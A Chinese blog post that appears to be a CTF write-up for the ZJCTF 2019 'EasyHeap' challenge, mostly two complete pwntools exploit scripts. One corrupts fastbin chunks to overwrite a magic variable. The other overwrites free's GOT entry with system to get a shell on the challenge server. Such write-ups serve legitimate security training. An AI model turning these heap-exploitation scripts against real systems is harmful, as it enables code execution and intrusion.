2. 技术
    3. [ZJCTF 2019]EasyHeap

    [ZJCTF 2019]EasyHeap

    技术2023-08-31  109

    下面的地址主要是因为这题没开PIE,地址是不会变化的… 下图是构造的chunk写magic变量 exp

    from pwn import * context.log_level = 'debug' def pause_debug(): log.info(proc.pidof(p)) pause() def create(size, content): p.sendlineafter('choice :', str(1)) p.sendlineafter('Heap :', str(size)) p.sendafter('heap:', content) def edit(idx, size, content): p.sendlineafter('choice :', str(2)) p.sendlineafter('Index :', str(idx)) p.sendlineafter('Heap :', str(size)) p.sendafter('heap :', content) def delete(idx): p.sendlineafter('choice :', str(3)) p.sendlineafter('Index :', str(idx)) proc_name = './easyheap' # p = process(proc_name) p = remote('node3.buuoj.cn', 29006) elf = ELF(proc_name) create(0x18, b'a') # 0 create(0x68, b'a') # 1 create(0x68, b'a') # 2 create(0x18, b'a') # 3 edit(0, 0x20, b'a' * 0x18 + p64(0xe1)) delete(1) create(0x68, b'a') # 1 create(0x68, b'a') # 4 2 delete(4) edit(2, 0x8, p64(0x6020ad)) create(0x68, b'b' *0x8) create(0x68, b'a' * 0x3 + p32(0x1306)) p.sendlineafter('choice :', str(0x1305)) p.interactive()

    上面在本地可以,远程不行,应该是环境部署有点问题…

    换个思路 因为存放malloc指针的数组也在附近,所以可以直接写指针指向free的got表,通过修改got中free的位置为system,同时写入/bin/sh,执行free(1)时即system(/bin/sh)拿到shell…

    from pwn import * context.log_level = 'debug' def pause_debug(): log.info(proc.pidof(p)) pause() def create(size, content): p.sendlineafter('choice :', str(1)) p.sendlineafter('Heap :', str(size)) p.sendafter('heap:', content) def edit(idx, size, content): p.sendlineafter('choice :', str(2)) p.sendlineafter('Index :', str(idx)) p.sendlineafter('Heap :', str(size)) p.sendafter('heap :', content) def delete(idx): p.sendlineafter('choice :', str(3)) p.sendlineafter('Index :', str(idx)) proc_name = './easyheap' p = process(proc_name) p = remote('node3.buuoj.cn', 25727) elf = ELF(proc_name) create(0x68, b'a') # 0 create(0x68, b'a') # 1 create(0x68, b'a') # 2 delete(2) edit(1, 0x78, b'/bin/sh'.ljust(0x68, b'\x00') + p64(0x71) + p64(0x6020ad)) create(0x68, b'b') # 2 create(0x68, b'b') # 3 fake_chunk edit(3, 0x2b, b'a' * 0x23 + p64(elf.got['free'])) edit(0, 0x8, p64(elf.plt['system'])) delete(1) p.interactive()

    很明显他flag在根目录,然后题目中给的在/home/pwn/flag,所以第一种方法拿不到…

    Processed: 0.011, SQL: 10